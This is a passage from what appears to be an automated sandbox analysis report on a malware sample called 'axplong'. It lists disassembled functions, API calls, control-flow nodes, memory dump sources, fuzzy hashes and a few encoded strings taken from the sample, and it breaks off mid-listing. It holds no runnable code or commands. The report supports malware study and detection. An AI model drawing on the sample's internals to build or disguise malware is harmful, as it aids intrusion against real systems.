                      • Instruction ID: b4736b19fa5968d615a03fc2bfc20606aac55a67772973d89cc22194c2f3d3f8
                      • Opcode Fuzzy Hash: 9b132883f0ce5fdf0d22d4a45ed9c36f9198213223aca0fa4514129e9fa87fc9
                      • Instruction Fuzzy Hash: 2911ECB690020CAFDB10DE95D984FDFB7BCAB48310F50526EE511E6180EB34EB45CB61
                      Function 007CD6EF Relevance: 1.5, APIs: 1, Instructions: 40memoryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1485 7cd6ef-7cd6fa 1486 7cd6fc-7cd706 1485->1486 1487 7cd708-7cd70e 1485->1487 1486->1487 1488 7cd73c-7cd747 call 7c7443 1486->1488 1489 7cd727-7cd738 RtlAllocateHeap 1487->1489 1490 7cd710-7cd711 1487->1490 1495 7cd749-7cd74b 1488->1495 1491 7cd73a 1489->1491 1492 7cd713-7cd71a call 7c9c81 1489->1492 1490->1489 1491->1495 1492->1488 1498 7cd71c-7cd725 call 7c8cf9 1492->1498 1498->1488 1498->1489
                      APIs
                      • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00000003,007CA5ED,?,007C74AE,?,00000000,?), ref: 007CD730
                      Memory Dump Source
                      • Source File: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Offset: 00790000, based on PE: true
                      • Associated: 00000004.00000002.2603398565.0000000000790000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603420342.00000000007F2000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603504694.00000000007F9000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.00000000007FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.000000000098C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A6D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A9F000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605045981.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605192224.0000000000C5E000.00000040.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_790000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocateHeap
                      • String ID:
                      • API String ID: 1279760036-0
                      • Opcode ID: daf1a6d1ef0dc805f55a0b1f256f2717fc143e9e291584f89069ea804b4f3ad0
                      • Instruction ID: 2cb8d98d08e0235a4d2014b7b16727ff2dcaf2c98664221295cf1dfe6d40835a
                      • Opcode Fuzzy Hash: daf1a6d1ef0dc805f55a0b1f256f2717fc143e9e291584f89069ea804b4f3ad0
                      • Instruction Fuzzy Hash: D8F0E931685124A69B313A259C05F5B7B999F817B0B18813DEC04AA181DE7DEC0087F1
                      Function 007A6AE0 Relevance: 1.3, APIs: 1, Instructions: 40sleepCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                      Memory Dump Source
                      • Source File: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Offset: 00790000, based on PE: true
                      • Associated: 00000004.00000002.2603398565.0000000000790000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603420342.00000000007F2000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603504694.00000000007F9000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.00000000007FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.000000000098C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A6D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A9F000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605045981.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605192224.0000000000C5E000.00000040.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_790000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: Sleep
                      • String ID:
                      • API String ID: 3472027048-0
                      • Opcode ID: 02ba47319f66dd0475a9b1fc6a497915829d1107f21c9bdf738a131e30671c1c
                      • Instruction ID: bff9b74260ffcd874afe739035959a542c5293dcde4ef667914b7d44f39ad44a
                      • Opcode Fuzzy Hash: 02ba47319f66dd0475a9b1fc6a497915829d1107f21c9bdf738a131e30671c1c
                      • Instruction Fuzzy Hash: FFF0F9B1E00518EBC700BB689C0B72D7B75A747720F940348E811673D2DB7C590187D2
                      Function 04BB0D2B Relevance: .0, Instructions: 34COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000004.00000002.2608793540.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_4bb0000_axplong.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0c1fdcf288f294ffea85887820d98ce586b514730f1409fdab34e8816c50dc79
                      • Instruction ID: 669aa59eb72a5edc749d0b9eb051783cf29f798a40073f851fd84181d90a00e4
                      • Opcode Fuzzy Hash: 0c1fdcf288f294ffea85887820d98ce586b514730f1409fdab34e8816c50dc79
                      • Instruction Fuzzy Hash: 68E02B5718C5509D4143755A41C43F67B12776B23033806C688C70A2A2F5853849F5D5
                      Function 04BB0D12 Relevance: .0, Instructions: 32COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000004.00000002.2608793540.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_4bb0000_axplong.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 64cefb48139f05d878558e1d0054c9e12450f7ced3d3a9aabc15816115b9a9d1
                      • Instruction ID: 69ad8b7fff1df11ab889a85d5cd1b2eaf195e6fbbb52deed54f1c1b9582f1519
                      • Opcode Fuzzy Hash: 64cefb48139f05d878558e1d0054c9e12450f7ced3d3a9aabc15816115b9a9d1
                      • Instruction Fuzzy Hash: 72E0269A348704EEC042349A8A883F3764633773307A043D16DD3195D1F6D93089B2D1
                      Function 04BB0D0A Relevance: .0, Instructions: 26COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000004.00000002.2608793540.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_4bb0000_axplong.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c1df5e7e5d2979c860d3bfbf452d488b6ae64d6a59171b57dfd1f9636668c265
                      • Instruction ID: a377df62e50585c717c57c5e728df5e0ad52db980618be86786eefa92aa1de62
                      • Opcode Fuzzy Hash: c1df5e7e5d2979c860d3bfbf452d488b6ae64d6a59171b57dfd1f9636668c265
                      • Instruction Fuzzy Hash: 25D05B5B34C611E88182314A91893F79A42376723126443D36DD7085D1F9C93199B1D1

                      Non-executed Functions

                      Function 0079E440 Relevance: 13.4, Strings: 10, Instructions: 878COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Offset: 00790000, based on PE: true
                      • Associated: 00000004.00000002.2603398565.0000000000790000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603420342.00000000007F2000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603504694.00000000007F9000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.00000000007FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.000000000098C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A6D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A9F000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605045981.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605192224.0000000000C5E000.00000040.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_790000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: #$111$246122658369$GqKudSO2$MJB+$MT==$UD==$WGt=$WWp=$fed3aa
                      • API String ID: 0-3582826820
                      • Opcode ID: 878e2bf2530bc459b2ea1fda87d38c18f501edf68cccd58beee938c2f8efb748
                      • Instruction ID: 3256377c84d8a8066a434f02089d5442d4b837c949d5d37b299fa1a67577e46e
                      • Opcode Fuzzy Hash: 878e2bf2530bc459b2ea1fda87d38c18f501edf68cccd58beee938c2f8efb748
                      • Instruction Fuzzy Hash: 9672D670A04248DBEF18EF68C9497DD7FB6AB46304F508299E805673C2D77D9A84CBD2
                      Function 007D3068 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1340COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Offset: 00790000, based on PE: true
                      • Associated: 00000004.00000002.2603398565.0000000000790000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603420342.00000000007F2000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603504694.00000000007F9000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.00000000007FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.000000000098C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A6D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A9F000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605045981.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605192224.0000000000C5E000.00000040.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_790000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: __floor_pentium4
                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                      • API String ID: 4168288129-2761157908
                      • Opcode ID: e3b8c6c16511c4aa11600edc83c8db887dade550bf9cbe58ca310af313a97656
                      • Instruction ID: 28a41a20ce706e66ed23df98004462e70be4d170686994e4227631bb74d11568
                      • Opcode Fuzzy Hash: e3b8c6c16511c4aa11600edc83c8db887dade550bf9cbe58ca310af313a97656
                      • Instruction Fuzzy Hash: F0C22871E086288FDB25CE28DD447A9B7B5EB48315F1441EBD84EA7340E779AE818F41
                      Function 007D2BD0 Relevance: 3.4, APIs: 2, Instructions: 450COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Offset: 00790000, based on PE: true
                      • Associated: 00000004.00000002.2603398565.0000000000790000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603420342.00000000007F2000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603504694.00000000007F9000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.00000000007FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.000000000098C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A6D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A9F000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605045981.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605192224.0000000000C5E000.00000040.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_790000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
                      • Instruction ID: cea52adddad7ef096458f310c446f6750624482400a0aa9896ac0db80e10d95f
                      • Opcode Fuzzy Hash: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
                      • Instruction Fuzzy Hash: 7CF13F71E012199FDF14CFA8C9806AEF7B1FF98314F15826AE819A7345D735AE42CB90
                      Function 007ACB1A Relevance: 1.5, APIs: 1, Instructions: 16timeCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • GetSystemTimePreciseAsFileTime.KERNEL32(?,007ACE82,?,?,?,?,007ACEB7,?,?,?,?,?,?,007AC42D,?,00000001), ref: 007ACB33
                      Memory Dump Source
                      • Source File: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Offset: 00790000, based on PE: true
                      • Associated: 00000004.00000002.2603398565.0000000000790000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603420342.00000000007F2000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603504694.00000000007F9000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.00000000007FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.000000000098C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A6D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A9F000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605045981.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605192224.0000000000C5E000.00000040.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_790000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: Time$FilePreciseSystem
                      • String ID:
                      • API String ID: 1802150274-0
                      • Opcode ID: 68fcdeeb20e31534a7d38424a36eba8f299ae836c63c7bc05de6a27a253b5200
                      • Instruction ID: d0c0c553aae4a640587d53217e600d8cb88f9b9f607e17a73d3fcfbf3863ab38
                      • Opcode Fuzzy Hash: 68fcdeeb20e31534a7d38424a36eba8f299ae836c63c7bc05de6a27a253b5200
                      • Instruction Fuzzy Hash: 3BD02232503038A3CA063B98EC048ACBB0CAA46B103014311EE056BF208A9AAC409BE8
                      Function 007C7D83 Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Offset: 00790000, based on PE: true
                      • Associated: 00000004.00000002.2603398565.0000000000790000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603420342.00000000007F2000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603504694.00000000007F9000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.00000000007FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.000000000098C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A6D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A9F000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605045981.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605192224.0000000000C5E000.00000040.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_790000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 0
                      • API String ID: 0-4108050209
                      • Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                      • Instruction ID: d64a3bfa5bbb4e13b1459e274866447c8275f953c453143e7dfd3339b0331d77
                      • Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                      • Instruction Fuzzy Hash: E351377230C64896DB3C9A3888DAFBE679A9F61300F14045DD843D7682DE5DDD45CF62
                      Function 00794CF0 Relevance: .7, Instructions: 701COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Offset: 00790000, based on PE: true
                      • Associated: 00000004.00000002.2603398565.0000000000790000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603420342.00000000007F2000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603504694.00000000007F9000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.00000000007FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.000000000098C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A6D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A9F000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605045981.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605192224.0000000000C5E000.00000040.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_790000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9ab0a773eb17abc798e8a758d11247c5dc64fbde147b778b7b23e1d3a04182a7
                      • Instruction ID: 1457fa763e3dd6be0b7bf5b3e3b4677feecea600868370924ab646312cc1a9e6
                      • Opcode Fuzzy Hash: 9ab0a773eb17abc798e8a758d11247c5dc64fbde147b778b7b23e1d3a04182a7
                      • Instruction Fuzzy Hash: 48224EB3F515144BDB4CCB9DDCA27EDB2E3AFD8214B0E803DA40AE3345EA79D9158648
                      Function 007D6F09 Relevance: .3, Instructions: 275COMMONLIBRARYCODE
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Offset: 00790000, based on PE: true
                      • Associated: 00000004.00000002.2603398565.0000000000790000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603420342.00000000007F2000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603504694.00000000007F9000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.00000000007FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.000000000098C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A6D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A9F000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605045981.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605192224.0000000000C5E000.00000040.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_790000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c110ad83820fda94993b0cd4d58b63d01a25c61c7ef882136eceaef9cf14c02f
                      • Instruction ID: 6c2de14838765dc10461d5e379f7bf2418c8438762e87bb0d3dfac1b3e4504ba
                      • Opcode Fuzzy Hash: c110ad83820fda94993b0cd4d58b63d01a25c61c7ef882136eceaef9cf14c02f
                      • Instruction Fuzzy Hash: 67B14A31214609DFD719CF28C486B657BB1FF45364F29865AE899CF3A1D33AE982CB40
                      Function 007AD312 Relevance: .2, Instructions: 172COMMON
                      Download Yara Rule
                      APIs
                      • ___std_exception_copy.LIBVCRUNTIME ref: 0079247E
                      Memory Dump Source
                      • Source File: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Offset: 00790000, based on PE: true
                      • Associated: 00000004.00000002.2603398565.0000000000790000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603420342.00000000007F2000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603504694.00000000007F9000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.00000000007FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.000000000098C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A6D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A9F000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605045981.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605192224.0000000000C5E000.00000040.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_790000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: ___std_exception_copy
                      • String ID:
                      • API String ID: 2659868963-0
                      • Opcode ID: 1f12f649fce8a1fa8dffa148c32a30db4616a6410ecf59ea8bc6ddb293338267
                      • Instruction ID: 7fd34605d7073fadf166f2302ca8acc172652fe83c7493daa1fd7cf1d9eaf5f1
                      • Opcode Fuzzy Hash: 1f12f649fce8a1fa8dffa148c32a30db4616a6410ecf59ea8bc6ddb293338267
                      • Instruction Fuzzy Hash: 59517AB2A006058FDB25CF54D8857AEBBF0FB88311F24C66AD406EBA91D7789D50CF54
                      Function 00794AF0 Relevance: .2, Instructions: 158COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Offset: 00790000, based on PE: true
                      • Associated: 00000004.00000002.2603398565.0000000000790000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603420342.00000000007F2000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603504694.00000000007F9000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.00000000007FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.000000000098C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A6D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A9F000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605045981.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605192224.0000000000C5E000.00000040.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_790000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c8ec932b6ebef8258c29052b01c2375f3050553eade59fbd226a938a62169f1d
                      • Instruction ID: 900c3310828d581b6b429a2839fd5d81c6a5c24a5d73d4083e47bc7b92229420
                      • Opcode Fuzzy Hash: c8ec932b6ebef8258c29052b01c2375f3050553eade59fbd226a938a62169f1d
                      • Instruction Fuzzy Hash: 8651D6716093D18FC319CF2D9515636BBE1BFCA200F084A9EE0DA87282D738D644CB92
                      Function 007D777B Relevance: .1, Instructions: 104COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Offset: 00790000, based on PE: true
                      • Associated: 00000004.00000002.2603398565.0000000000790000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603420342.00000000007F2000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603504694.00000000007F9000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.00000000007FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.000000000098C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A6D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A9F000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605045981.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605192224.0000000000C5E000.00000040.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_790000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a5b1fb2c0d40ddf62553d3b0a148364afcacc2dc9d6affe81e0e7d12d7551d40
                      • Instruction ID: 8a25ebe8de4b18d86309fa77320727191f7ffa30bc65dd6b8dd69f805c7b9911
                      • Opcode Fuzzy Hash: a5b1fb2c0d40ddf62553d3b0a148364afcacc2dc9d6affe81e0e7d12d7551d40
                      • Instruction Fuzzy Hash: A221B673F204394B770CC47ECC5727DB6E1C68C541745823AE8A6EA2C1D96CD917E2E4
                      Function 007D765B Relevance: .1, Instructions: 81COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Offset: 00790000, based on PE: true
                      • Associated: 00000004.00000002.2603398565.0000000000790000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603420342.00000000007F2000.00000040.00000001.01000000.00000008.sdmpDownload File
